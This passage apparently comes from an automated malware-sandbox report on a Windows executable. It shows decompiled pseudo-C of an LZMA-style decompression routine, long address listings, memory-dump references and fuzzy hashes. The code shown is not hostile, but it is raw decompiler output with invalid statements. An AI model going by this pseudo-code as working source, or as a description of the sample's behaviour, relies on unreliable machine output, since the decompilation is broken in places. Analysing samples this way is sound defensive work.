													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                0x00000000
                                                0x00406bc4
                                                0x00406bc4
                                                0x00406bc8
                                                0x00406be9
                                                0x00406bf0
                                                0x00406bf6
                                                0x00406bfc
                                                0x00406c0e
                                                0x00406c14
                                                0x00406c19
                                                0x00000000
                                                0x00406bca
                                                0x00406bd0
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00406f94
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00407195
                                                0x004071ab
                                                0x004071b3
                                                0x004071ba
                                                0x004071bc
                                                0x004071c3
                                                0x004071c7
                                                0x004071c7
                                                0x00406ff2
                                                0x00406ff9
                                                0x00407001
                                                0x00407004
                                                0x00407007
                                                0x00407007
                                                0x0040700d
                                                0x0040700d
                                                0x004067a9
                                                0x004067a9
                                                0x004067a9
                                                0x004067b2
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x00000000
                                                0x004067c3
                                                0x00000000
                                                0x00000000
                                                0x004067cc
                                                0x004067cf
                                                0x004067d2
                                                0x004067d6
                                                0x00000000
                                                0x00000000
                                                0x004067dc
                                                0x004067df
                                                0x004067e1
                                                0x004067e2
                                                0x004067e5
                                                0x004067e7
                                                0x004067e8
                                                0x004067ea
                                                0x004067ed
                                                0x004067f2
                                                0x004067f7
                                                0x00406800
                                                0x00406813
                                                0x00406816
                                                0x00406822
                                                0x0040684a
                                                0x0040684c
                                                0x0040685a
                                                0x0040685a
                                                0x0040685e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040684e
                                                0x0040684e
                                                0x00406851
                                                0x00406852
                                                0x00406852
                                                0x00000000
                                                0x0040684e
                                                0x00406828
                                                0x0040682d
                                                0x0040682d
                                                0x00406836
                                                0x0040683e
                                                0x00406841
                                                0x00000000
                                                0x00406847
                                                0x00406847
                                                0x00000000
                                                0x00406847
                                                0x00000000
                                                0x00406864
                                                0x00406864
                                                0x00406868
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406871
                                                0x00406881
                                                0x00406884
                                                0x00406887
                                                0x00406887
                                                0x00406887
                                                0x0040688a
                                                0x0040688e
                                                0x00000000
                                                0x00000000
                                                0x00406890
                                                0x00406896
                                                0x004068c0
                                                0x004068c6
                                                0x004068cd
                                                0x00000000
                                                0x004068cd
                                                0x0040689c
                                                0x0040689f
                                                0x004068a4
                                                0x004068a4
                                                0x004068af
                                                0x004068b7
                                                0x004068ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068ff
                                                0x00406905
                                                0x00406908
                                                0x00406915
                                                0x0040691d
                                                0x00000000
                                                0x00000000
                                                0x004068d4
                                                0x004068d4
                                                0x004068d8
                                                0x00407123
                                                0x00000000
                                                0x00407123
                                                0x004068e4
                                                0x004068ef
                                                0x004068ef
                                                0x004068ef
                                                0x004068f2
                                                0x004068f5
                                                0x004068f8
                                                0x004068fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406925
                                                0x00406927
                                                0x0040692a
                                                0x0040699b
                                                0x0040699e
                                                0x004069a1
                                                0x004069a8
                                                0x004069b2
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x0040692c
                                                0x00406930
                                                0x00406933
                                                0x00406935
                                                0x00406938
                                                0x0040693b
                                                0x0040693d
                                                0x00406940
                                                0x00406942
                                                0x00406947
                                                0x0040694a
                                                0x0040694d
                                                0x00406951
                                                0x00406958
                                                0x0040695b
                                                0x00406962
                                                0x00406966
                                                0x0040696e
                                                0x0040696e
                                                0x0040696e
                                                0x00406968
                                                0x00406968
                                                0x00406968
                                                0x0040695d
                                                0x0040695d
                                                0x0040695d
                                                0x00406972
                                                0x00406975
                                                0x00406993
                                                0x00406995
                                                0x00000000
                                                0x00406977
                                                0x00406977
                                                0x0040697a
                                                0x0040697d
                                                0x00406980
                                                0x00406982
                                                0x00406982
                                                0x00406982
                                                0x00406985
                                                0x00406988
                                                0x0040698a
                                                0x0040698b
                                                0x0040698e
                                                0x00000000
                                                0x0040698e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c2e
                                                0x00406c32
                                                0x00406c55
                                                0x00406c58
                                                0x00406c5b
                                                0x00406c65
                                                0x00406c34
                                                0x00406c34
                                                0x00406c37
                                                0x00406c3a
                                                0x00406c3d
                                                0x00406c4a
                                                0x00406c4d
                                                0x00406c4d
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00000000
                                                0x00406c71
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c7b
                                                0x00406c7f
                                                0x00000000
                                                0x00000000
                                                0x00406c85
                                                0x00406c87
                                                0x00406c8b
                                                0x00406c8b
                                                0x00406c8e
                                                0x00406c92
                                                0x00000000
                                                0x00000000
                                                0x00406ce2
                                                0x00406ce6
                                                0x00406ced
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cfd
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f91
                                                0x00406ce8
                                                0x00000000
                                                0x00000000
                                                0x00406d09
                                                0x00406d0d
                                                0x00406d14
                                                0x00406d17
                                                0x00406d1a
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d1d
                                                0x00406d20
                                                0x00406d23
                                                0x00406d23
                                                0x00406d26
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d2c
                                                0x00406d2f
                                                0x00406d36
                                                0x00406d3b
                                                0x00000000
                                                0x00000000
                                                0x00406dc9
                                                0x00406dc9
                                                0x00406dcd
                                                0x0040716b
                                                0x00000000
                                                0x0040716b
                                                0x00406dd3
                                                0x00406dd6
                                                0x00406dd9
                                                0x00406ddd
                                                0x00406de0
                                                0x00406de6
                                                0x00406de8
                                                0x00406de8
                                                0x00406de8
                                                0x00406deb
                                                0x00406dee
                                                0x00000000
                                                0x00000000
                                                0x004069be
                                                0x004069be
                                                0x004069c2
                                                0x0040712f
                                                0x00000000
                                                0x0040712f
                                                0x004069c8
                                                0x004069cb
                                                0x004069ce
                                                0x004069d2
                                                0x004069d5
                                                0x004069db
                                                0x004069dd
                                                0x004069dd
                                                0x004069dd
                                                0x004069e0
                                                0x004069e3
                                                0x004069e3
                                                0x004069e6
                                                0x004069e9
                                                0x00000000
                                                0x00000000
                                                0x004069ef
                                                0x004069f5
                                                0x00000000
                                                0x00000000
                                                0x004069fb
                                                0x004069fb
                                                0x004069ff
                                                0x00406a02
                                                0x00406a05
                                                0x00406a08
                                                0x00406a0b
                                                0x00406a0c
                                                0x00406a0f
                                                0x00406a11
                                                0x00406a17
                                                0x00406a1a
                                                0x00406a1d
                                                0x00406a20
                                                0x00406a23
                                                0x00406a26
                                                0x00406a29
                                                0x00406a45
                                                0x00406a48
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a55
                                                0x00406a59
                                                0x00406a5b
                                                0x00406a5f
                                                0x00406a2b
                                                0x00406a2b
                                                0x00406a2f
                                                0x00406a37
                                                0x00406a3c
                                                0x00406a3e
                                                0x00406a40
                                                0x00406a40
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6c
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a77
                                                0x00406a77
                                                0x00406a7b
                                                0x0040713b
                                                0x00000000
                                                0x0040713b
                                                0x00406a81
                                                0x00406a84
                                                0x00406a87
                                                0x00406a8b
                                                0x00406a8e
                                                0x00406a94
                                                0x00406a96
                                                0x00406a96
                                                0x00406a96
                                                0x00406a99
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406aa2
                                                0x00000000
                                                0x00000000
                                                0x00406aa4
                                                0x00406aa7
                                                0x00406aaa
                                                0x00406aad
                                                0x00406ab0
                                                0x00406ab3
                                                0x00406ab6
                                                0x00406ab9
                                                0x00406abc
                                                0x00406abf
                                                0x00406ac2
                                                0x00406ada
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406aea
                                                0x00406aec
                                                0x00406ac4
                                                0x00406ac4
                                                0x00406acc
                                                0x00406ad1
                                                0x00406ad3
                                                0x00406ad5
                                                0x00406ad5
                                                0x00406aef
                                                0x00406af6
                                                0x00406af9
                                                0x00000000
                                                0x00406afb
                                                0x00000000
                                                0x00406afb
                                                0x00406af9
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00000000
                                                0x00000000
                                                0x00406b3b
                                                0x00406b3b
                                                0x00406b3f
                                                0x00407147
                                                0x00000000
                                                0x00407147
                                                0x00406b45
                                                0x00406b48
                                                0x00406b4b
                                                0x00406b4f
                                                0x00406b52
                                                0x00406b58
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b66
                                                0x00406b04
                                                0x00406b04
                                                0x00406b07
                                                0x00000000
                                                0x00406b07
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6b
                                                0x00406b6e
                                                0x00406b71
                                                0x00406b74
                                                0x00406b77
                                                0x00406b7a
                                                0x00406b7d
                                                0x00406b80
                                                0x00406b83
                                                0x00406b86
                                                0x00406b9e
                                                0x00406ba1
                                                0x00406ba4
                                                0x00406ba7
                                                0x00406ba7
                                                0x00406baa
                                                0x00406bae
                                                0x00406bb0
                                                0x00406b88
                                                0x00406b88
                                                0x00406b90
                                                0x00406b95
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406bb3
                                                0x00406bba
                                                0x00406bbd
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e50
                                                0x00407177
                                                0x00000000
                                                0x00407177
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e60
                                                0x00406e63
                                                0x00406e69
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6e
                                                0x00000000
                                                0x00000000
                                                0x00406c1c
                                                0x00406c1c
                                                0x00406c1f
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00000000
                                                0x00406f5b
                                                0x00406f5f
                                                0x00406f81
                                                0x00406f84
                                                0x00406f8e
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f91
                                                0x00406f61
                                                0x00406f64
                                                0x00406f68
                                                0x00406f6b
                                                0x00406f6b
                                                0x00406f6e
                                                0x00000000
                                                0x00000000
                                                0x00407018
                                                0x0040701c
                                                0x0040703a
                                                0x0040703a
                                                0x0040703a
                                                0x00407041
                                                0x00407048
                                                0x0040704f
                                                0x0040704f
                                                0x00000000
                                                0x0040704f
                                                0x0040701e
                                                0x00407021
                                                0x00407024
                                                0x00407027
                                                0x0040702e
                                                0x00406f72
                                                0x00406f72
                                                0x00406f75
                                                0x00000000
                                                0x00000000
                                                0x00407109
                                                0x0040710c
                                                0x0040700d
                                                0x00000000
                                                0x00000000
                                                0x00406d43
                                                0x00406d45
                                                0x00406d4c
                                                0x00406d4d
                                                0x00406d4f
                                                0x00406d52
                                                0x00000000
                                                0x00000000
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d62
                                                0x00406d64
                                                0x00406d64
                                                0x00406d65
                                                0x00406d68
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d80
                                                0x00000000
                                                0x00000000
                                                0x00407056
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x00000000
                                                0x00000000
                                                0x00407065
                                                0x00407065
                                                0x00407069
                                                0x004071a1
                                                0x00000000
                                                0x004071a1
                                                0x0040706f
                                                0x00407072
                                                0x00407075
                                                0x00407079
                                                0x0040707c
                                                0x00407082
                                                0x00407084
                                                0x00407084
                                                0x00407084
                                                0x00407087
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708d
                                                0x0040708d
                                                0x00407091
                                                0x004070f1
                                                0x004070f4
                                                0x004070f9
                                                0x004070fa
                                                0x004070fc
                                                0x004070fe
                                                0x00407101
                                                0x0040700d
                                                0x0040700d
                                                0x00000000
                                                0x00407013
                                                0x0040700d
                                                0x00407093
                                                0x00407099
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x004070b1
                                                0x004070b4
                                                0x004070cd
                                                0x004070d0
                                                0x004070d3
                                                0x004070d6
                                                0x004070da
                                                0x004070dc
                                                0x004070dc
                                                0x004070dd
                                                0x004070e0
                                                0x004070b6
                                                0x004070b6
                                                0x004070be
                                                0x004070c3
                                                0x004070c5
                                                0x004070c8
                                                0x004070c8
                                                0x004070e3
                                                0x004070ea
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x00406d88
                                                0x00406d8b
                                                0x00406dc1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406ef9
                                                0x00407183
                                                0x00000000
                                                0x00407183
                                                0x00406eff
                                                0x00406f02
                                                0x00000000
                                                0x00000000
                                                0x00406f08
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f0f
                                                0x00406f0f
                                                0x00000000
                                                0x00406f0f
                                                0x00406d8d
                                                0x00406d8f
                                                0x00406d91
                                                0x00406d93
                                                0x00406d96
                                                0x00406d97
                                                0x00406d99
                                                0x00406d9b
                                                0x00406d9e
                                                0x00406da1
                                                0x00406db7
                                                0x00406dbc
                                                0x00406df4
                                                0x00406df4
                                                0x00406df8
                                                0x00406e24
                                                0x00406e26
                                                0x00406e2d
                                                0x00406e30
                                                0x00406e33
                                                0x00406e33
                                                0x00406e38
                                                0x00406e38
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e44
                                                0x00406e47
                                                0x00406e74
                                                0x00406e74
                                                0x00406e77
                                                0x00406e7a
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00000000
                                                0x00406eee
                                                0x00406e7c
                                                0x00406e82
                                                0x00406e85
                                                0x00406e88
                                                0x00406e8b
                                                0x00406e8e
                                                0x00406e91
                                                0x00406e94
                                                0x00406e97
                                                0x00406e9a
                                                0x00406e9d
                                                0x00406eb6
                                                0x00406eb8
                                                0x00406ebb
                                                0x00406ebc
                                                0x00406ebf
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec6
                                                0x00406ec8
                                                0x00406ecb
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed4
                                                0x00406ed6
                                                0x00406ed6
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edd
                                                0x00406e9f
                                                0x00406e9f
                                                0x00406ea7
                                                0x00406eac
                                                0x00406eae
                                                0x00406eb1
                                                0x00406eb1
                                                0x00406ee0
                                                0x00406ee7
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00000000
                                                0x00406ee9
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee7
                                                0x00406dfa
                                                0x00406dfd
                                                0x00406dff
                                                0x00406e02
                                                0x00406e05
                                                0x00406e08
                                                0x00406e0a
                                                0x00406e0d
                                                0x00406e10
                                                0x00406e10
                                                0x00406e13
                                                0x00406e13
                                                0x00406e16
                                                0x00406e1d
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00000000
                                                0x00406e1f
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1d
                                                0x00406da3
                                                0x00406da6
                                                0x00406da8
                                                0x00406dab
                                                0x00000000
                                                0x00000000
                                                0x00406b0a
                                                0x00406b0a
                                                0x00406b0e
                                                0x00407153
                                                0x00000000
                                                0x00407153
                                                0x00406b14
                                                0x00406b17
                                                0x00406b1a
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b28
                                                0x00406b2b
                                                0x00406b2e
                                                0x00406b31
                                                0x00406b33
                                                0x00406b33
                                                0x00406b33
                                                0x00000000
                                                0x00000000
                                                0x00406c95
                                                0x00406c95
                                                0x00406c99
                                                0x0040715f
                                                0x00000000
                                                0x0040715f
                                                0x00406c9f
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406caa
                                                0x00406caa
                                                0x00406caa
                                                0x00406cad
                                                0x00406cb0
                                                0x00406cb3
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbd
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cc2
                                                0x00406cc5
                                                0x00406cc8
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406cce
                                                0x00406cd0
                                                0x00406cd0
                                                0x00000000
                                                0x00000000
                                                0x00406f12
                                                0x00406f12
                                                0x00406f12
                                                0x00406f16
                                                0x00000000
                                                0x00000000
                                                0x00406f1c
                                                0x00406f1f
                                                0x00406f22
                                                0x00406f25
                                                0x00406f27
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00406f2d
                                                0x00406f30
                                                0x00406f33
                                                0x00406f36
                                                0x00406f39
                                                0x00406f3a
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3f
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4f
                                                0x00406f51
                                                0x00406f54
                                                0x00000000
                                                0x00406f56
                                                0x00406cd3
                                                0x00406cd3
                                                0x00000000
                                                0x00406cd3
                                                0x00406f54
                                                0x00407189
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x004071c0
                                                0x004071c0
                                                0x00000000
                                                0x004071c0
                                                0x0040700d
                                                0x00406f94
                                                0x00406f91
                                                0x00000000
                                                0x00406bc8

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                                • Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
                                                • Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                                • Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406CE2, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406CE2() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
